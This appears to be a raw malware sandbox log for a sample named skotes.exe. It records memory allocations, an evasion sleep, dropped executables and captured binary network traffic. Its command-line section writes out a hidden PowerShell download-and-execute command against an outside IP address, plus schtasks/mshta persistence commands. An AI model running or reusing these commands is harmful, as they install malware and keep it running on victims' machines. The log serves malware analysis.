process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description skotes.exe tried to sleep 426 seconds, actually delayed analysis time by 426 seconds
Time & API Arguments Status Return Repeated

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x0000018c
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x0000018c
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x0000018c
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x0000018c
output_buffer: 
1 1 0
file C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
file C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe
file C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe
file C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe
file C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe
file C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
file C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe
file C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe
file C:\Users\test22\AppData\Local\Temp\764661\Macromedia.com
file C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
cmdline PowerShell -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
cmdline C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
cmdline mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta
cmdline schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2832
thread_handle: 0x00000338
process_identifier: 2828
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000344
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: PowerShell
parameters: -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
filepath: PowerShell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c copy Turner Turner.cmd & Turner.cmd
filepath: cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x031b0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00014000', u'virtual_address': u'0x000d4000', u'entropy': 7.05117352361143, u'name': u'.rsrc', u'virtual_size': u'0x00013e48'} entropy 7.05117352361 description A section with a high entropy has been found
Data received HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Feb 2025 01:44:09 GMT Content-Type: application/octet-stream Content-Length: 2121728 Last-Modified: Tue, 11 Feb 2025 01:06:14 GMT Connection: keep-alive ETag: "67aaa286-206000" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $§»-IãÚCãÚCãÚC¸²@íÚC¸²FBÚC6·GñÚC6·@õÚC6·F–ÚC¸²G÷ÚC¸²BðÚCãÚB5ÚCx´JâÚCx´¼âÚCx´AâÚCRichãÚCPELœVðfà êš J@ÐJŠ‘ @€W kX´}Jd}J €€@à.rsrcX@À.idata  ”@À 0*°–@àwdedeidu°à0¢˜@àbobdrwdlJ: @à.taggant0 J"> @à
Data received ¬êÏ4Âgi–;Hhº<ä~>šUã+a$ÆÚi3š-~vñÅãÛʂ}\ÜT•7ðëœÔèSs=ã8ø×äþ”¹LÀ3[>+?t\ÜTƖ)ÆkqþÛ;>…,¸8÷ 8šìü½Q/³P</æ8’oüq;Ëÿ–:æÌiø8]W0t\W0t\W0t\ÝKíø¿Q¿¥µßÞp•Hàºh+ó8¹öµÁ'g{5ö&½Q'g@1¢ÇµSØ´P€ˆå8Víø8+ã½U:þ+ã8Rº4+ã8ÏnÀ&.ãt\W0t\W0t\W0t\ÜTú*œðšïäܰ+ã8ۊ› ¹8"l´·Ô?˜+ã8š¼ü³ä:ÿm+ã8–²”Phš(âë–²”Ph/š®vœ$)§k´9Â:þ5+ã8±Üîy.D;®80šÔèߘã8+ŒæšL}x/;W0t\W0t\Ý ”=hšÕØ¿X¿Éµæ2)„kóŽQÛãíRº+ã8ûóŠP¨‹å8’oüæRÝKÕØ¿X¿Éµæ2)„kóŽQÛãíRº+ã8Ïn0t\W0t\W0t\W0t\ÜTú*œ¡šïäܰ+ã8ÛgTˆÈ×+Ö›ìíÇ´·Ô?˜+ã8šAKúót(ãµi®8<˜¤q×'ä8+|Ç}R»+ã8Wìà:šÕØ¿X¿üµÂã+˜ÒØq×'ã8*gE¼§³ì7;ÿm)ã8–³”Pó¼©+ã8š(âë–³”Ph/š®iœ$)§k´9Â:ñ5+ã8±ÜáyBC;®80zµóáQÍó-Ô3úg*ã´á/xNä9Ö/~È–ü³Ü3}Ï}R¹D+ã8ƳäÑ+xsä-~;n)œÔq×OÄ©Ô+d*ã¾g¿Å½^*q`$þ¼Éµ–29;ó{î²Ï–úµ_*´<šÔèߘã8+ŒÙÏÆ÷aþ1PJƒå8šL}xÇ~;W0t\W0t\W0t\W0t\ÜTú*œxïäܰ+ã8ÛE,1íä TÛqÿeÏG8+ãPü¦å8šÔèߘã8+ŒµtÄ't\W0t\W0t\ÜTú*œXïäܰ+ã8ۊ› ¹8"l´·Ô?˜+ã8š8>”ki5yn;Wøî(ãµ×xxäèö ö<½p'eCã8ã~èm®%:igxl®ìæäzÃÛ·(ãqÖã8+f|Rº,+ã8VíÌ8+ã·×/³P@¤å8’oøµÜ?˜³+ã8À‚µtÄ'PÍÿç8]ÜTÃÝKx/¡;¬$ϱåîy3½;®80’7ü·×/~tÀ3+U*:}*ãw\ÜT•7ðíš@÷Â;œ¦ø½P/|=* ó¼£+ã8šèøµö%µ±LÚüî:Q}ÿi–{k)$FæÎè¨â8*£)–Ÿä8–%kx¹D¨*ã8Ñö¹D-Sk4šìà<Pæ:)ÓmH—YhùPHæ»h+ó8¹ÊµÓ'g{5ö4³Ô'qúm®ìæÕïmضPœ„å8Vã8+f|R»<+ã8VÒü8+ãîšZâÕ(ãµÔ#Á*iLÆ3¿3+~÷i®84U}éѵRÆ_Ïiø8yÑ×=3/à+?t\W0t\W0t\ÜTú*œxïäܰ+ã8ÛE,1íä TÛqÿeÏG8+ãµ3žÃ+~÷eÏ}7+ã8ȖçRW0t\W0t\ÜT•7üíǖáû)pþRúˆìäèVíø8+ãÞVíü8Rº4+ã8Víô8+ãPt—å8š¤ô½U:þÕ+ã8Rºô+ã8”*h1a*»<š¤ôµÔpæÁ¹DìÈí˜ììSü®å8œîÜÒÛŸ(ã½U:ýÉ+ã8R§ä+ã8”*h<a*»<šìà²ÒÃÿioä˜î„qÕÏä8+fu¬ãÏ–'Hh»<ä~1šZã+šn)PÒüÏ–ûµ^*´<šìüq–gä8+ã8Rzx+ã8+ãq–oä8+ã8Rz€+ã8+ã³§Sä8Í;¾]+ã8+|þÙ®ì=å/9Ð/~ǬãÏ–'Hh»<ä~1šZã+a$ÙÖi1š~iÙøÙšm‚åšLz+?t\W0t\W0t\W0t\ÜTú*œ8ïäܰ+ã8ÛµíÇÂE,1íä TÛqÿeÏG8+ãµ`–²ð’Zãp{tÿ®í=å~q`$ûÓi?š(âë–z„+ã¿Q¿µµŸoä8ö<½p'eCã8ã~èm®%:igxl®ì’\8+~zÃÛŠ(ãq–gä8+ã8®80V­$8+ã8+:¾U+ã8+ã8š…P8+xeä ~q`$ý¼Êµ–?9–;Hh§0ä~=šVã딂èœîÜèyP~;Þ´(ã·×³Pª‘å8š½ô½UxNä~q`$þ¼Éµ–29;ó{î²Ï–úµ_*´<šÔèߘã8+ŒÙÏÆ_Ïn¼!.ãt\W0t\W0t\ÜTú*œïäܰ+ã8ÛgTފá°Ãþþ9èœìèß²+ã8™H8}Ï}«b0”²èäø;ÿm+ã8±\xƒê8R¹D*ã8}+ñ-ëä}Yìà8*ã´ä7dÆ+—0šÔPã=ã8•¥ð8œÕðÏö6ú€Öç¤8R–²<"kgCwxЖ±Lôñ8+ããÎŏµtÄ'µä7vxãæ8¯$Ï5”¹PÀ3ŸQ*g|ÛvVìà=y÷ä8”±PVìà:y 9”²4yí;–<PÓ&ã8x×­;–<P'&ã8\W0t\ÜTú*œÂïäܰ+ã8ÛgT(ފá°Ãþþ9èœìèß²+ã8±„šìü J–-x+ã g¹X¨,8+|ÿy¹|%k}ÿM¹h¨ 8+|çYit›ìV¿Õi”±p"%FÝFÑ(ãµÌS‹9çO·Pc/æ8šì4·%~ÇU®84˜¼0³ÔG=š¤Ò9R¹D+ã8yÅJ;¹x¼)Ækš)G+:ø+ã8R¤<+ã8Vëü;+ãq›tÿ®$4˜ìq+ã8®$<Á3ºÁ+f|m¹D–¹\•kð³ÔK}’kø³Ô3;8+ã8Vëø8+ãqÐã8+®fäôßMSF›¼{)ŠPßêå8šì9çK·µ!Ý.ãµÜ3q<¯®84˜èøµÔOóáQÍó-Ô_}ÿE–¹x›ì µÜgqïEÙ:ÿm.8š(;û(~ø*4µäC|ÿ~¬êÏ0®39Z)PÕøÏ–úµ_*ôHhb0Þ¼ûµ–29À/xeä÷÷M–'Z®D“ ä(+•(šÆà¼PÞ}•kà¼i jÀÞ{‰(ã½U}ÿ~–±Lôñ8+ãã
Data received ÃØ3)(ã½U9ÿm-~ï}R¹h+ã8Vì)+ã~×kä½k•šÔ úšheBã8ã~óm®&:hgxl®ì’}2+µëyj«;®80Vìà8*ã´Äg;ÿy+ã8R¹T+ã8Wì 8’!ôÊ=–±Ó–%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z+ãêÀ3–+f|¯Ì±åÐM”¹8x2ý8® šWœ”%íäPAä8œÔ\Pggã8;q÷IR¹D+ã8y/9ÝhVìà2œÔ$PwIä8’oÀ½éóÊ–ä聛t¨›`•&ãÎùUk<‘NåµÄ_gB¹ÐµÜk¦µP¨î;+ãÊ–½D•iÇP®$D•#Ã)–Žý8ÙµPDýå8’oü~×'üµÄ7;ÿA+ã8R¹l+ã8Wì$8’!ôÊ=–±`Җ%»k+ó8¹ÈµØ'gz5ö%½Q'g@1zã+ãêÀ3~+f|R¹D*ã8Ü q×3ä8+:ÿ}ã8m¹`®î+ã÷÷¹é{“!ä(+•,šÐà¼SÞ{•kà¼i ò±ã8ÃØ'(ã½Ugeä;ùKqÿ0V0+fT–0Ð=ñº8yc 8”±yk/9–·ÜC;ÿmã833R*еAm¹D”±xx{8®8$’£È(ã)~8Á›t¨›tµI®ï8ç/Õe}-#U«;šÜ½k•šÔ$úšheBã8ã~óm®&:hgxl®ì’—0+µëyŠ©;®80Wìà5šÜq×[ä8+:ÿEã8m¹x®î+ã÷÷Ié{“!ä(+•,šÐà¼SÞ{•kà¼i ò±8ã8ÃØï$(ã½U:ÿm*ã8–‰„Vì8+ãq×7ó8+9ÿI+fB¹ÐµÜs¦µP¨î;+ãÊ–½D•iÇP®$D•#Ã)–Gû8ÙµPüå8’oü¼J¿ðÒ³·Ô+Ç+ã½}~tøÇÑþ3g`+p÷¹3‚n*HŸÔ q×'ð8+¢x*ãáš[:ÿmp÷Q3oX+f| ®l,¹æµÛt¨›t¨šCgE¼ø J6úx}/c]–‰l•!ôÊ=–±xҖ%»k+ó8¹ÈµØ'gz5ö%½Q'g@1zý+ãêÀ3ž +f|m¹D–‰TYì48+ãq×_ó8+9ÿQ+fB¹ÐµÜC¦µP¨î;+ãÊ–½D•iÇP®$D•#Ã)– ú8ÙµP0ÿå8’oüq×'ã8*ï­R¹P+ã8Vì)+ã~×Cä½k•šÔ\úšheBã8ã~óm®&:hgxl®ì’P>+µëy^×;®80•Fh4û(›PŸìäSØ-ã8’7̵]³ ×+öF+ã·Üsî¨*ã´a”±`Yìà)+ãP÷3ã8Ɩ4~×'ó·ÜkþN+ã½UfÀ•:š+³¨›t¨– ½j*i<#F>Q6ø¸r(~ïE®î+ã÷÷Qé{“!ä(+•,šÐà¼SÞ{•kà¼i ò±-ã8ÃØ"(ã½U9ÿm~ï}R¹h+ã8Vì)+ã~×kä½k•šÔ úšheBã8ã~óm®&:hgxl®ì’=?+µëy6Ö;®80Vìà8*ã´Äg;ÿy+ã8R¹T+ã8Wì 8’!ôÊ=–±Ó–%»k+ó8¹ÈµØ'gz5ö%½Q'g@1zÄ+ãêÀ3B +f|¯Ì±åÐ}”¹8xø8® šWœŒ=íäP ]ä8œÔ\P3cã8;q÷IR¹D+ã8yû9ÝhVìà*œÔ$PEä8’oÀ½éóÊ–ä聛t¨›`•&ãÎùUk<‘NåµÄ_gB¹ÐµÜk¦µP¨î;+ãÊ–½D•iÇP®$D•#Ã)–Nø8ÙµPùå8’oü~×'ôµÄ7;ÿA+ã8R¹l+ã8Wì$8’!ôÊ=–±`Җ%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z£+ãêÀ3* +f|R¹D*ã8Ü q×3ä8+:ÿ}ã8m¹`®î+ã÷÷¹é{“!ä(+•,šÐà¼SÞ{•kà¼i ò±Ý/ã8ÃØÓ (ã½Ugeä;ù;qÿ0=+fT–0ÐMõº8yO8”±y7*9–·ÜC;ÿmã83ï^*еAm¹D”±xxG8®8$’£È(ã)~8Á›t¨›tµI®ï8ç/Õe}-#U«;šÜ½k•šÔ$úšheBã8ã~óm®&:hgxl®ì’W=+µëyVÔ;®80Wìà-šÜq×[ä8+:ÿEã8m¹x®î+ã÷÷Ié{“!ä(+•,šÐà¼SÞ{•kà¼i ò±ø.ã8ÃØ»!(ã½U:ÿm*ã8–‰„Vì8+ãq×7ó8+9ÿI+fB¹ÐµÜs¦µP¨î;+ãÊ–½D•iÇP®$D•#Ã)–æ8ÙµP$ûå8’oü¼J¿ðÒ³ ¶Ô+“+ã½}~tø¿Ôþ3Sm+p÷¹3+n*HŸÔ q×'È8+~t*ãáš[:ÿmp÷Q3[e+f| ®l,¹æµÛt¨›t¨šCgE¼ø J6úx}/c]–‰l•!ôÊ=–±xҖ%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z½+ãêÀ3J +f|m¹D–‰TYì48+ãq×_ó8+9ÿQ+fB¹ÐµÜC¦µP¨î;+ãÊ–½D•iÇP®$D•#Ã)–àæ8ÙµPÜúå8’oüq×'ã8*ï­R¹P+ã8Vì)+ã~×Cä½k•šÔ\úšheBã8ã~óm®&:hgxl®ì’;+µëy*Ò;®80•Fh4û)›øŸìäSä(ã8’7̵]³° ×+ÂC+ã·Üsº¥*ã´a”±`Yìà!+ãPƒNã8Ɩ4~×'Ë·ÜkÊK+ã½UfÀ•:š+³¨›t¨– ½j*i<#F>Q6ø¸r(~ïE®î+ã÷÷Qé{“!ä(+•,šÐà¼SÞ{•kà¼i ò±Â(ã8ÃØÛ?(ã½U9ÿm~ï}R¹h+ã8Vì)+ã~×kä½k•šÔ úšheBã8ã~óm®&:hgxl®ì’ý;+µëyÑ;®80Vìà8*ã´Äg;ÿy+ã8R¹T+ã8Wì 8’!ôÊ=–±Ó–%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z„+ãêÀ3>+f|¯Ì±æÐՕ¹8zéºE*ã¼i(— y£9®ì=åòÖE*ã¼i—'yÏ9®ì*åâE*ã¼i—3û(›tŸìäU±æÐٕ¹8VÒô8+ãµ
Data received _*ôµV;ó{Öh1š-~vÛø~×'ä¿g¿ÃµV;ó{Ö/h.š-~v~q`$þ¼ûµ–29À/~=š¾ø³Ô{ÿuçµÔG;ÿY+ã8R¹t+ã8˜¼(³Ò/xNä ~q`$þ¼Êµ–29–;Hhº0ä~>šUãë®aXg++ãµÒ/Ös%=}÷Ail—kh6š~H›Ô4³ä_9Ð~=˜ì QŠxööÿy¹X›ì³ÔO}ÿ}¬êÏ–%³ÔK}ÿy–:³ÔO}ÿ};ãñ±h~×'çP9Ëä8’oøµItú¿ž8Â3Çw+f|RçT ìä·Ò:ý(ã8Rç@ ìäqÕæ8+³PÄÐä8’oø·Òÿž:Á3~ê+~ÿu®80Wî˜8Vîœ8+ãqçtÿR§Ô+ã8Vî”8+ã¿Q¿ñµÄK}íý§Èa*¤0šìíšÓ¼³É׫%ã´ÜOysä~q`$û¼ùµ*´<”=h(šR)PíüÏ–úµ_*´<š¼ô¿g¿ÂµV;ó{Ö/h/š-~v)P¥üéä~>šUãë–±Lôñ8+ããÎŏµÜ;×wxì8–çSãt\W0t\W0t\W0t\ÜTú*œ ¿ïäܰ+ã8ÛgTˆÈ×+Ö›ìîÆÛqÿeÏG8+ãµh–»ÈÂ$ XÍó-Ô3×N›Ô³ä7yxä~è””<”Yh,”¾;ši) ®zäÍh—kiWÔµä7;ÿm+ã8¬=Ì–õ·Ð³Ò±äÒ*¶<”=h’Zã´V;ó{Ö/h/š-~v)P¥üéä~>šUãë–±Lôñ8+ããÎÅ÷aþ1PâÁä8šL}Úµæ»}÷yiT}ƒ0t\W0t\W0t\W0t\–½”Pó¼@Öä8š(âÛ–ý¿X¿úµ±å9n0t\ÜTú*œX›ïäܰ+ã8ۊ› ¹8"l´·Ô?˜+ã8šøyNä‰q×'ä8+?Ó+ãÒÝßñ+ã½U~÷eÏ}7+ã8ÈÅ_Ïn0t\W0t\W0t\W0t\–å}\W0t\W0t\W0t\ÜTú*œxïäܰ+ã8ÛE,1íä TÛqÿeÏG8+ã9#3lè+f|¬$Ï–±Lôñ8+ããšL}À3éô+?t\W0t\W0t\ÜTú*œxïäܰ+ã8ÛE,1íä TÛqÿeÏG8+ã¸è/ãÌ*ÕP2Ûä8’oø¿Q¼óµÜ?˜³+ã8À_Ïn´P±Öä8]W0t\ÜTìüîš8´³mº<3;é+f|¬$Ïmº<–:æÌiø8Á3‘õ+?t\ÝKÕȽh•š-p4Ü)ã8¨í;+ãÊ–´D•hÇS®$D•#ÃÁ0–&ëÁ3ÒÙ+f|þ$qÖã8+:þã8Í}>Ïn d(ãt\W0t\W0t\W0t\ÜT•7ðîš8‹µì~þ¹@-Ró±ø(ã8–‚,˜ÄèNgã+ã)’ä8–3‚n*ã¸:Sz=ììPeõ+ãµ^®=)*Qj1ši}ÿm6ĵRXAæÎcã8ª}ÿm6ð=Ræ<)ÓS}÷m–% X®$;™%AK;»h+ó8¹Û·Ð®{­å;+³PyÆä8’oø¿Qg^+ã·Éf]p§D}xsä´PYÆä8’oøµI6æ J–¹D›íȵÔ#¤³ïfÇe³Êؖ¢áÂ3Ó}+~÷e®84Шí;+ãÊ–‹D•hÇk”»D•#Ã)–“ä8–îêÆ3êæ+~ÿi®80˜|þƃæšLz+‰íy3&;–¹@•o𳐺(ÊʂµtÄ&<®ã+âégE¹¡µ/ë´áÇ3#z+~ö®84Шí;+ãÊ–‹D•hÇk”»D•#ÃÁ –îêÆ3~ç+f|Rº,+ã8ÊʂµtÄ&<3mM+Â+ãP—vâ8\W0t\®m,¹çµn{UW0t\ÜTŖ0Æ–í´Æ~zÚôPæ Á>”ø#˜ÒôµV®î+ã)~1ǔ¨0e¹4ÂۊP»Rå8’oð~ãµVŃåÌiü8n¼ð~×ãµ^ÞãÎÞÎ+ãÙÊÄ&0ÝKÕȽh•š-¤»h+ó8¹öµÁ'g{5ö&½Q'g@1¢ÃµSØ´PTÇä8’oüqÖã8+:þã8mú8Ïnˆc(ãt\W0t\ÜTÜüîš8rÉRº(+ã8œ åqÖò8+9>‘åû•kiC=ZµêšUv+ãٚm‚çS/ãt\W0t\ÜTÃފµ`ÂÇRº(+ã8VíÈ8+ã½îóµÖ|ÿm¹æµ.®ì+âò(fó8+‚)-|þ–:³ÏåšLz+~`¨*ã8‘®?)*CóñI”§;,+ó8¹Ã·Ù®pæÛµPåÀä8’oø¿Q¿¼·Ùf[p¥D}xxä³PÉÀä8’oøµY6æ 